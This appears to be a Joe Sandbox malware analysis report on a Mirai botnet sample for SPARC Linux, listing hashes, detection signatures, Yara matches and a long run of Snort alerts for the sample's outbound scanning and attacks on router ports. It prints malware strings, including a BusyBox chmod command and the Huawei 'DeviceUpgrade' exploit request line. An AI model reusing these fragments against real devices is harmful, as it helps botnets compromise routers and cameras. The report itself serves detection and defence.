Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
if33NMq1O2.elf

Overview

General Information

Sample name:if33NMq1O2.elf
renamed because original name is a hash value
Original sample name:164d5388d64b5e1427f2df0375e51352.elf
Analysis ID:1368672
MD5:164d5388d64b5e1427f2df0375e51352
SHA1:fb0d8c86b6909f1137dfb77a40c716fdd453ac13
SHA256:1f21e09f4da090783aa816fdb36fd530da92aea0fe7967f3ae8def43b2f27de7
Tags:32elfmiraisparc
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Sample tries to kill multiple processes (SIGKILL)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1368672
Start date and time:2024-01-02 06:23:04 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 47s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:if33NMq1O2.elf
renamed because original name is a hash value
Original Sample Name:164d5388d64b5e1427f2df0375e51352.elf
Detection:MAL
Classification:mal100.spre.troj.linELF@0/0@2/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/if33NMq1O2.elf
PID:6209
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
unstable_is_the_history_of_universe
Standard Error:
  • system is lnxubuntu20
  • wrapper-2.0 (PID: 6224, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6225, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6226, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6227, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 6228, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6229, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
if33NMq1O2.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
    if33NMq1O2.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      if33NMq1O2.elfMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
      • 0x10c47:$x2: /bin/busybox chmod 777 * /tmp/
      • 0x10990:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
      • 0x108d8:$s3: POST /cdn-cgi/
      if33NMq1O2.elfMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
      • 0x108d8:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security
        SourceRuleDescriptionAuthorStrings
        6213.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
          6213.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            6213.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
            • 0x10c47:$x2: /bin/busybox chmod 777 * /tmp/
            • 0x10990:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            • 0x108d8:$s3: POST /cdn-cgi/
            6213.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
            • 0x108d8:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
            6209.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
              Click to see the 7 entries
              Timestamp:192.168.2.2352.51.210.25354244802025883 01/02/24-06:25:26.161554
              SID:2025883
              Source Port:54244
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.148.36.4256504802025883 01/02/24-06:24:01.272066
              SID:2025883
              Source Port:56504
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2391.200.67.11059548802030092 01/02/24-06:24:19.258178
              SID:2030092
              Source Port:59548
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.208.169.837612802025883 01/02/24-06:24:14.264263
              SID:2025883
              Source Port:37612
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23162.159.129.10357618802025883 01/02/24-06:24:03.166357
              SID:2025883
              Source Port:57618
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.230.152.22550120802030092 01/02/24-06:24:30.618084
              SID:2030092
              Source Port:50120
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23188.128.206.16847120802025883 01/02/24-06:24:13.779989
              SID:2025883
              Source Port:47120
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.33.51.1137284802025883 01/02/24-06:25:10.230054
              SID:2025883
              Source Port:37284
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2343.192.122.6537836802025883 01/02/24-06:25:44.376815
              SID:2025883
              Source Port:37836
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2358.152.149.559232802025883 01/02/24-06:24:41.116385
              SID:2025883
              Source Port:59232
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2363.195.193.24042464802025883 01/02/24-06:23:51.372398
              SID:2025883
              Source Port:42464
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.234.152.153.16453294802025883 01/02/24-06:23:55.535212
              SID:2025883
              Source Port:53294
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23107.22.7.9054290802030092 01/02/24-06:25:15.619385
              SID:2030092
              Source Port:54290
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2367.212.162.8360502802025883 01/02/24-06:23:51.361230
              SID:2025883
              Source Port:60502
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.63.78.7035444802025883 01/02/24-06:24:24.766885
              SID:2025883
              Source Port:35444
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.107.170.11651938802030092 01/02/24-06:24:04.121161
              SID:2030092
              Source Port:51938
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.176.244.12750336802025883 01/02/24-06:24:45.251137
              SID:2025883
              Source Port:50336
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23194.8.215.9047106802025883 01/02/24-06:25:39.116051
              SID:2025883
              Source Port:47106
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.230.152.22549976802030092 01/02/24-06:24:24.820851
              SID:2030092
              Source Port:49976
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.92.147.4650912802030092 01/02/24-06:24:41.035412
              SID:2030092
              Source Port:50912
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.31.77.17848046802030092 01/02/24-06:25:05.043017
              SID:2030092
              Source Port:48046
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.82.113.6149624802025883 01/02/24-06:23:55.139649
              SID:2025883
              Source Port:49624
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2369.192.43.5855492802030092 01/02/24-06:25:21.993012
              SID:2030092
              Source Port:55492
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2349.44.196.20855840802030092 01/02/24-06:24:41.307799
              SID:2030092
              Source Port:55840
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23103.39.16.6847170802025883 01/02/24-06:24:15.125482
              SID:2025883
              Source Port:47170
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.232.21.48.24839876802025883 01/02/24-06:24:51.823067
              SID:2025883
              Source Port:39876
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23118.232.97.5137750802030092 01/02/24-06:24:56.010020
              SID:2030092
              Source Port:37750
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23171.244.56.10744564802030092 01/02/24-06:24:03.532179
              SID:2030092
              Source Port:44564
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23151.101.7.16645530802030092 01/02/24-06:23:49.491267
              SID:2030092
              Source Port:45530
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2377.75.231.12448474802030092 01/02/24-06:23:59.226697
              SID:2030092
              Source Port:48474
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.27.61.23650004802030092 01/02/24-06:24:48.847612
              SID:2030092
              Source Port:50004
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2324.90.220.12451082802025883 01/02/24-06:25:34.883177
              SID:2025883
              Source Port:51082
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2366.22.55.12933832802025883 01/02/24-06:23:51.506025
              SID:2025883
              Source Port:33832
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.213.63.23060686802030092 01/02/24-06:24:37.365549
              SID:2030092
              Source Port:60686
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.232.17.176.1145384802025883 01/02/24-06:25:15.290469
              SID:2025883
              Source Port:45384
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.18.64.5447396802030092 01/02/24-06:24:30.779179
              SID:2030092
              Source Port:47396
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23184.26.2.23933266802025883 01/02/24-06:25:32.158283
              SID:2025883
              Source Port:33266
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23152.67.216.18058250802030092 01/02/24-06:24:09.004126
              SID:2030092
              Source Port:58250
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.204.125.10656392802030092 01/02/24-06:24:13.920039
              SID:2030092
              Source Port:56392
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23103.57.209.4560092802025883 01/02/24-06:25:10.115853
              SID:2025883
              Source Port:60092
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.85.0.13949486802030092 01/02/24-06:24:38.209929
              SID:2030092
              Source Port:49486
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.181.35.21934712802030092 01/02/24-06:24:09.179650
              SID:2030092
              Source Port:34712
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.247.20.25537352372152829579 01/02/24-06:25:07.990796
              SID:2829579
              Source Port:37352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23157.245.212.16341682802030092 01/02/24-06:24:14.930071
              SID:2030092
              Source Port:41682
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.235.99.4053148372152829579 01/02/24-06:25:03.497246
              SID:2829579
              Source Port:53148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2323.204.125.10656446802025883 01/02/24-06:24:14.743069
              SID:2025883
              Source Port:56446
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2347.95.228.7335778802030092 01/02/24-06:24:59.105890
              SID:2030092
              Source Port:35778
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.235.102.23034064372152835222 01/02/24-06:23:48.382924
              SID:2835222
              Source Port:34064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2354.254.143.7760350802030092 01/02/24-06:23:58.484471
              SID:2030092
              Source Port:60350
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23184.85.178.23639722802030092 01/02/24-06:25:16.029669
              SID:2030092
              Source Port:39722
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2377.40.58.2351878802030092 01/02/24-06:25:02.046176
              SID:2030092
              Source Port:51878
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23142.58.40.15445582802030092 01/02/24-06:24:23.995843
              SID:2030092
              Source Port:45582
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.234.219.23440728802025883 01/02/24-06:25:19.115031
              SID:2025883
              Source Port:40728
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.222.136.16659240802030092 01/02/24-06:25:34.867652
              SID:2030092
              Source Port:59240
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2377.246.183.3046272802030092 01/02/24-06:24:55.948920
              SID:2030092
              Source Port:46272
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.235.201.189.18145518802030092 01/02/24-06:25:25.755860
              SID:2030092
              Source Port:45518
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2373.116.187.14544290802025883 01/02/24-06:24:46.089608
              SID:2025883
              Source Port:44290
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.254.103.5538508372152829579 01/02/24-06:24:27.790071
              SID:2829579
              Source Port:38508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.232.19.103.22048104802025883 01/02/24-06:25:04.208897
              SID:2025883
              Source Port:48104
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.154.143.21732888802030092 01/02/24-06:25:38.870167
              SID:2030092
              Source Port:32888
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23174.84.210.335298802025883 01/02/24-06:25:31.914564
              SID:2025883
              Source Port:35298
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23212.109.194.4333828802030092 01/02/24-06:24:23.748097
              SID:2030092
              Source Port:33828
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.169.231.14560782802025883 01/02/24-06:24:54.905175
              SID:2025883
              Source Port:60782
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2372.37.218.19948926802025883 01/02/24-06:24:05.713034
              SID:2025883
              Source Port:48926
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.99.215.10858622802030092 01/02/24-06:24:54.969765
              SID:2030092
              Source Port:58622
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23203.198.100.11341360802025883 01/02/24-06:25:25.334124
              SID:2025883
              Source Port:41360
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2399.142.66.14860348802025883 01/02/24-06:25:29.576053
              SID:2025883
              Source Port:60348
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23102.130.122.21740696802025883 01/02/24-06:24:58.885496
              SID:2025883
              Source Port:40696
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23121.36.115.24947442802025883 01/02/24-06:23:55.420371
              SID:2025883
              Source Port:47442
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2369.80.206.8755282802030092 01/02/24-06:24:19.154384
              SID:2030092
              Source Port:55282
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.77.130.17758998372152835222 01/02/24-06:24:06.202488
              SID:2835222
              Source Port:58998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2334.196.134.24735922802030092 01/02/24-06:25:34.999781
              SID:2030092
              Source Port:35922
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23139.59.72.23049116802025883 01/02/24-06:25:11.932825
              SID:2025883
              Source Port:49116
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23206.233.253.22452608802025883 01/02/24-06:24:09.052927
              SID:2025883
              Source Port:52608
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23221.153.44.20137018802030092 01/02/24-06:25:09.681419
              SID:2030092
              Source Port:37018
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23116.203.70.2860376802025883 01/02/24-06:23:52.035635
              SID:2025883
              Source Port:60376
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23173.234.100.23044204802030092 01/02/24-06:24:40.616364
              SID:2030092
              Source Port:44204
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23166.161.129.1740674802030092 01/02/24-06:24:44.925325
              SID:2030092
              Source Port:40674
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2351.210.89.5356836802025883 01/02/24-06:25:38.038524
              SID:2025883
              Source Port:56836
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.57.78.17447542802030092 01/02/24-06:25:36.406858
              SID:2030092
              Source Port:47542
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2361.220.62.14550398802025883 01/02/24-06:24:33.218083
              SID:2025883
              Source Port:50398
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23213.136.91.1739410802030092 01/02/24-06:24:04.299968
              SID:2030092
              Source Port:39410
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23170.130.122.6435776802025883 01/02/24-06:25:42.642200
              SID:2025883
              Source Port:35776
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.204.118.16159748802030092 01/02/24-06:24:50.106168
              SID:2030092
              Source Port:59748
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2386.181.28.25240796802030092 01/02/24-06:24:28.186813
              SID:2030092
              Source Port:40796
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23101.42.248.24039924802025883 01/02/24-06:24:43.377309
              SID:2025883
              Source Port:39924
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.254.94.2659154372152835222 01/02/24-06:25:03.334223
              SID:2835222
              Source Port:59154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23183.111.183.23054570802025883 01/02/24-06:25:04.271400
              SID:2025883
              Source Port:54570
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23108.186.100.20951226802030092 01/02/24-06:23:54.821481
              SID:2030092
              Source Port:51226
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23208.109.68.2335052802030092 01/02/24-06:25:09.832341
              SID:2030092
              Source Port:35052
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.18.81.6639906802030092 01/02/24-06:25:01.307707
              SID:2030092
              Source Port:39906
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.227.73.8552698802025883 01/02/24-06:25:34.683145
              SID:2025883
              Source Port:52698
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.254.85.3256952372152835222 01/02/24-06:25:03.334382
              SID:2835222
              Source Port:56952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2346.4.102.25247674802030092 01/02/24-06:25:43.105983
              SID:2030092
              Source Port:47674
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2399.16.143.12833176802030092 01/02/24-06:24:14.071830
              SID:2030092
              Source Port:33176
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.181.35.21934372802025883 01/02/24-06:24:01.259878
              SID:2025883
              Source Port:34372
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.48.76.9154442802025883 01/02/24-06:25:30.270726
              SID:2025883
              Source Port:54442
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2383.148.198.4442066802030092 01/02/24-06:25:42.757624
              SID:2030092
              Source Port:42066
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2334.120.145.3256908802025883 01/02/24-06:25:06.732120
              SID:2025883
              Source Port:56908
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.225.232.16551466802030092 01/02/24-06:24:15.088251
              SID:2030092
              Source Port:51466
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.121.24.21239268802030092 01/02/24-06:25:34.772506
              SID:2030092
              Source Port:39268
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.238.134.23.4358860802030092 01/02/24-06:24:27.781954
              SID:2030092
              Source Port:58860
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2351.255.91.12053876802025883 01/02/24-06:25:02.258701
              SID:2025883
              Source Port:53876
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2374.48.45.14649620802030092 01/02/24-06:24:50.099124
              SID:2030092
              Source Port:49620
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.164.18.3348318802025883 01/02/24-06:25:38.054989
              SID:2025883
              Source Port:48318
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.66.79.13355714802025883 01/02/24-06:24:14.281778
              SID:2025883
              Source Port:55714
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2385.221.227.12437694802025883 01/02/24-06:24:18.042374
              SID:2025883
              Source Port:37694
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23167.172.137.11148674802030092 01/02/24-06:23:49.370306
              SID:2030092
              Source Port:48674
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23217.160.215.20551516802030092 01/02/24-06:24:23.994544
              SID:2030092
              Source Port:51516
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.46.166.18836382802025883 01/02/24-06:24:10.948725
              SID:2025883
              Source Port:36382
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23108.158.129.15660976802025883 01/02/24-06:24:55.937734
              SID:2025883
              Source Port:60976
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2362.244.41.14754538802025883 01/02/24-06:25:25.284302
              SID:2025883
              Source Port:54538
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23178.159.46.9149008802030092 01/02/24-06:25:39.173695
              SID:2030092
              Source Port:49008
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23193.182.144.15439910802030092 01/02/24-06:25:31.359030
              SID:2030092
              Source Port:39910
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.235.102.17138108372152829579 01/02/24-06:24:02.515190
              SID:2829579
              Source Port:38108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2313.239.48.11535360802025883 01/02/24-06:24:04.056293
              SID:2025883
              Source Port:35360
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2351.178.25.2639996802025883 01/02/24-06:25:19.073342
              SID:2025883
              Source Port:39996
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.3.111.16147366802030092 01/02/24-06:25:43.020357
              SID:2030092
              Source Port:47366
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23123.60.116.9758084802030092 01/02/24-06:24:45.347164
              SID:2030092
              Source Port:58084
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23209.235.140.22455632802030092 01/02/24-06:24:48.911367
              SID:2030092
              Source Port:55632
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.172.204.12456566802030092 01/02/24-06:24:59.388502
              SID:2030092
              Source Port:56566
